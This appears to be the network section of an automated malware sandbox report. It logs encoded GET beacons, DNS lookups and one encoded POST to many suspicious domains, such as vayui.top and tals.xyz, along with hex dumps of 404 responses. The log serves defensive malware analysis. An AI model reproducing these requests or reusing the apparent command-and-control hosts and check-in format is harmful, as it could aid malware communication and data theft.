          Source: global trafficHTTP traffic detected: GET /vlg0/?ZQ=9w6eOuayM&2WLcH=qomJeF/TtZ0QUZ/lu9bWw6fKKq403Qj3n7TxRqREffWgONqaapTJsxm8a+ti36YSjfwaEcz7GfWHOzY8D/KxmBZDEE3LvMzzAWoLAjA157mklULIe55/Q78= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.officinadelpasso.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /4twy/?2WLcH=mBCElVLkK93E7Nf+Sf/fyHG4g+iIHO2SyRrruRXkg+zqtIWho1c/UJ5ICRtgbVPxo7eZFunASSkRDpjuJtL+E+17mAmUYSpmNLkEhz/yhl+/g4aluoCzA3U=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.vayui.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /tj5o/?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.tals.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /sr6d/?2WLcH=1SpMEcLzJ9Sn7Ad5q3DkRiZVN2jVBq+dlMgZT/nq/UyfSDPywFazxbh+/qzvL+EnIyZaTvIKZcPRrxMSWCBfdTtLgScf+bZOQub9cvrYC+7J/tJ5pDuOaT0=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.nartex-uf.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /ftvk/?2WLcH=GExPV6KtXOXigkukfMfleD4xRaYqvrj5rkn1yqQr0MAVEMidlCaC83oYsDNl6Uf72gZXo4lyCEReg4R57wnVyD0gHtEFldueDrd90mwd3SDfs8vpytBw7tE=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.614genetics.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /r45a/?2WLcH=VI7arJMCR+F5a8GIF7LvlydvT54UqGGGJzEBbUfyg8Id9FJQQiiIP0Zhv5D8EvYCLyQ71yr7yDtQnd5dLG0ZmCq3JeeWBBH/ELG6XL/ZgjHL6FvdoncqEJc=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.prhmcjdz.tokyoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /sp9i/?2WLcH=/yY+7m1AZbgb0K2/LwtBLxCjXaU0b9j5Pi53FyGdgcs4UrSukFrrBxiVM6k9vqLarsWUeALRJhCd8Ws3EraXiGfQePxT8U++C5GowWJeifl9yaVeP5ongLY=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.cg19g5.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /gzx8/?2WLcH=zakk0Z6QX+PeMKuO9doP3TuSH4tsROWjUg+AcMIBC3jNAdeJcFpvchgVbxSCnVd2G7blpBbqDXciYyMV8Uav3uCQEiSaobLJsegQ2xqoFvZbzlxviNb8bJg=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.nuy25c9t.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /rb2m/?2WLcH=Dszlqgj74cWUzrw4FgoVa9SEyJwv0S7kouPjlT8bGIWxA2GhpIId8RbI+3ekZHN60cH9zamMOD41tV9XrOGIH+Ivz1i08chkDZaL4252rRmFu2Eqz92NoWw=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.golivenow.liveConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /2muc/?2WLcH=BGEoK7nai7wQrj2aEM2P8qfkzKtqrNNfgf6S4Ju7MMLh1Bc/IyqyqzXdBYzJKfwOd0JT6GOuPVdJb0BzGYwvQg/AACFP7fG4nxHnnQpuCqy2cfx3+fFWSZg=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.kanadeviainova.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /zet9/?2WLcH=moLtZ3Q2YS5/hkjwzodJ1swdKZQozUlOYqvt2cuq7Yvv9xGOVSWf5GjI0u28lvuJt3GCOLDggiamVwDKnOFVInrpmEPV2qsYzTve7f9TvzKyqWkrNPKErR0=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.mydreamdeal.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /ij3v/?2WLcH=Z1ob5t14nDPacJC0EUrCTzBKiEN+xlFbGZTgiBJJl0QL8NgJJ8ECyZW/F0sl+HO9WEhrMzz4zoZTxRA1IM3jizzPUf5s72Oblbx3ef6zp59TnsaC/1UaQJc=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.aquax.cloudConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /h7t0/?2WLcH=6TLewr8yhertJGkqH+FQWeFrQNLAh3ybhDcYvQV/Hdp8NbM7L1MKR/llezyAaDw0ekOxFhGBkmvPnBSy2dX3PczRZMZfTyd1n8zEZdYU3+dh/YokLdnKa7I=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.108.foundationConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /vlg0/?ZQ=9w6eOuayM&2WLcH=qomJeF/TtZ0QUZ/lu9bWw6fKKq403Qj3n7TxRqREffWgONqaapTJsxm8a+ti36YSjfwaEcz7GfWHOzY8D/KxmBZDEE3LvMzzAWoLAjA157mklULIe55/Q78= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.officinadelpasso.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /4twy/?2WLcH=mBCElVLkK93E7Nf+Sf/fyHG4g+iIHO2SyRrruRXkg+zqtIWho1c/UJ5ICRtgbVPxo7eZFunASSkRDpjuJtL+E+17mAmUYSpmNLkEhz/yhl+/g4aluoCzA3U=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.vayui.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /tj5o/?ZQ=9w6eOuayM&2WLcH=MhGDhTK4KRmGDwnOvV5WTz4iIRJmk2m8IatiCmUJgqSFlXJgrRiMUM9JCqLDwZv9mOpEe9GWmALCKqKQahiZVY7y7ZV5P9kCtZ0hNHTZPf+sBxGPFSp4opc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.tals.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /sr6d/?2WLcH=1SpMEcLzJ9Sn7Ad5q3DkRiZVN2jVBq+dlMgZT/nq/UyfSDPywFazxbh+/qzvL+EnIyZaTvIKZcPRrxMSWCBfdTtLgScf+bZOQub9cvrYC+7J/tJ5pDuOaT0=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.nartex-uf.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /ftvk/?2WLcH=GExPV6KtXOXigkukfMfleD4xRaYqvrj5rkn1yqQr0MAVEMidlCaC83oYsDNl6Uf72gZXo4lyCEReg4R57wnVyD0gHtEFldueDrd90mwd3SDfs8vpytBw7tE=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.614genetics.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /r45a/?2WLcH=VI7arJMCR+F5a8GIF7LvlydvT54UqGGGJzEBbUfyg8Id9FJQQiiIP0Zhv5D8EvYCLyQ71yr7yDtQnd5dLG0ZmCq3JeeWBBH/ELG6XL/ZgjHL6FvdoncqEJc=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.prhmcjdz.tokyoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /sp9i/?2WLcH=/yY+7m1AZbgb0K2/LwtBLxCjXaU0b9j5Pi53FyGdgcs4UrSukFrrBxiVM6k9vqLarsWUeALRJhCd8Ws3EraXiGfQePxT8U++C5GowWJeifl9yaVeP5ongLY=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.cg19g5.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficHTTP traffic detected: GET /gzx8/?2WLcH=zakk0Z6QX+PeMKuO9doP3TuSH4tsROWjUg+AcMIBC3jNAdeJcFpvchgVbxSCnVd2G7blpBbqDXciYyMV8Uav3uCQEiSaobLJsegQ2xqoFvZbzlxviNb8bJg=&ZQ=9w6eOuayM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.nuy25c9t.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
          Source: global trafficDNS traffic detected: DNS query: enechado.ru.com
          Source: global trafficDNS traffic detected: DNS query: www.officinadelpasso.shop
          Source: global trafficDNS traffic detected: DNS query: www.vayui.top
          Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
          Source: global trafficDNS traffic detected: DNS query: www.nartex-uf.online
          Source: global trafficDNS traffic detected: DNS query: www.newtoppornx1.buzz
          Source: global trafficDNS traffic detected: DNS query: www.614genetics.online
          Source: global trafficDNS traffic detected: DNS query: www.prhmcjdz.tokyo
          Source: global trafficDNS traffic detected: DNS query: www.cg19g5.pro
          Source: global trafficDNS traffic detected: DNS query: www.nuy25c9t.sbs
          Source: global trafficDNS traffic detected: DNS query: www.golivenow.live
          Source: global trafficDNS traffic detected: DNS query: www.kanadeviainova.net
          Source: global trafficDNS traffic detected: DNS query: www.mydreamdeal.click
          Source: global trafficDNS traffic detected: DNS query: www.aquax.cloud
          Source: global trafficDNS traffic detected: DNS query: www.75178.club
          Source: global trafficDNS traffic detected: DNS query: www.108.foundation
          Source: global trafficDNS traffic detected: DNS query: www.bagazone.online
          Source: unknownHTTP traffic detected: POST /4twy/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usHost: www.vayui.topOrigin: http://www.vayui.topReferer: http://www.vayui.top/4twy/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 202Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0Data Raw: 32 57 4c 63 48 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 53 57 64 37 76 57 57 49 4f 4d 78 64 73 45 50 67 61 48 52 56 37 32 4b 65 54 38 37 31 64 71 4d 43 32 51 3d 3d Data Ascii: 2WLcH=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5SWd7vWWIOMxdsEPgaHRV72KeT871dqMC2Q==
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 10:57:26 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 10:57:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nn%2FY3DFf23%2Fnv1pl6kKEYYRLmOSlP4zMhfz%2BIeD9s4j5GkPjBr%2BKxJuNfO9sT%2F0ZTQdRD84sox9j22%2Blyghgq9uOesy5pAxWfKPh%2B5fcGeAAPsiR3y1tFgxjBQrz68l"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e811e8e0c0e43da-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=97323&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 10:57:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rW0Y8xbgpcUmH5YdZfgzYjN9Hl3tRSoydkmHgvKo%2FjhuxFVdUZznlZ3Kq0t273M40EM7JfTgz7JijBqwsYvg8kUSaVok3z7zE0T0Nd0LUnbEe%2BBPTduAZQDaadmt3kpr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e811e9e7bdf7cfc-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=97601&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 10:57:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEsP6jJOsaZ4UcO2QBFwlE78G0mqDg5EToieOys4eVQZKhtYIq2MocKj2XfAk5IbfpOlJ5l4oS7djY%2BwpMx1plkyNmCc2L2pl6pXV1hlZdgm1BcpFFFk5YRX53OaJdUu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e811eaedec8729b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=97841&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7878&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 10:57:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lcKpuNuvD79J%2FgwQVB9l7KrOarVNBtdPXlsLOf0DbGn8RdODJk8wi2LAQmbjGcma9RmB5cCBFOvIGhDVC1w4w5EhrwZSWJu9ffHCnupNG8tPjls0IsjK2keSTUzDLEC7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e811ebf3f8641de-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=97340&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=451&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 10:58:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 ad f0 c6 0f ee 6d b3 b3 32 e7 96 a1 77 0d db ee be 3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 3a b7 a8 75 26 8e 1b f4 f8 94 a6 e9 77 22 5e b8 a0 57 16 b6 7b 37 f8 38 59 5a f3 b9 e9 6c ff 40 86 61 a7 97 d0 2d 0a 92 b2 fe d8 7f 48 43 a8 01 b0 0d 1f 5d a1 ee bb 82 66 7c 00 16 3d 20 b8 84 75 b7 cb 6c 29 d3 f3 5c 8f 02 8c 78 2a ec 68 fa d5 ca 74 36 03 2c 8c 1d 07 cf e7 e6 9c 6b 5e 65 60 cc b0 4c 84 76 10 b8 6b 40 dd 8c 09 65 70 73 00 b7 0d 9b 20 a2 ac 1d a0 19 e5 e4 ed 92 8a 4c e9 d4 08 18 8f 35 68 d5 0e 26 c3 13 6b 71 3f b8 f6 dc 3b 10 dd ab 5b cb b7 ae ed 2c 4c 55 69 4c dc 8e 36 95 f2 83 b5 25 49 e7 b8 d7 96 6d 0e 22 99 be a2 12 cd 45 8f fd cd 35 b2 f8 ca 5d 9b a0 a5 63 d1 8f 04 7f 07 5f ae 16 ae 0b 83 7f 30 77 ef 9c 9d 82 5a de 90 1d b5 aa da 17 12 de 54 9c 76 81 6b 2c 9e a5 44 95 c0 e5 ad a4 db 23 65 4d a6 aa 6d 19 2f 1f 50 85 4f 44 d0 bf c6 26 70 a7 f9 5e 49 01 cb 56 cb 6a a4 af 9b 52 93 81 55 42 43
